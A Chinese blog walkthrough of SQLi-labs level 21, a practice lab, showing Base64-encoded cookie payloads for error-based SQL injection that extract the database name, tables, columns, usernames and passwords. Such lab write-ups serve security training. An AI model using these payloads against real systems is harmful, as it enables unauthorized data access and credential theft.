Sqlilabs-21

来到了第 21 关，看着 21 关，我知道，第一阶段快结束了，马上要到…啪…给我认真写博文…

这一关卡的题目给内容貌似一点都不符合…还是得从 cookie 下手，但肯定不跟20 关一样，通过提交正常的数据，我们可以看到，COOKIE 长的有点不太一样…

Base64Decode 解码 YWRtaW4= 得到的结果是 admin，所以说后台将 COOKIE 进行了 Base64 的编码，所以构造 payload 时，应该在 cookie 类似于:[得先正确登入]

uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkj

uname=admin') and extractvalue(1,concat(0x7e,(select database()),0x7e))#

怎么猜单引号加括号，这里当你构造好 payload post 以后，会出现 BUG OFF…但是加了’)#就没有，这就才出来了。接下来直接上 payload：

–查表
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpLDB4N2UpKSM=

uname=admin') and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#

–查列
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lID0gJ3VzZXJzJyBsaW1pdCAwLDEpLDB4N2UpKSM=

uname=admin') and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),0x7e))#

–查用户名
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VybmFtZSBmcm9tIHVzZXJzIGxpbWl0IDAsMSksMHg3ZSkpIw==

uname=admin') and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#

–查密码
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDAsMSksMHg3ZSkpIw==

uname=admin') and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))#

????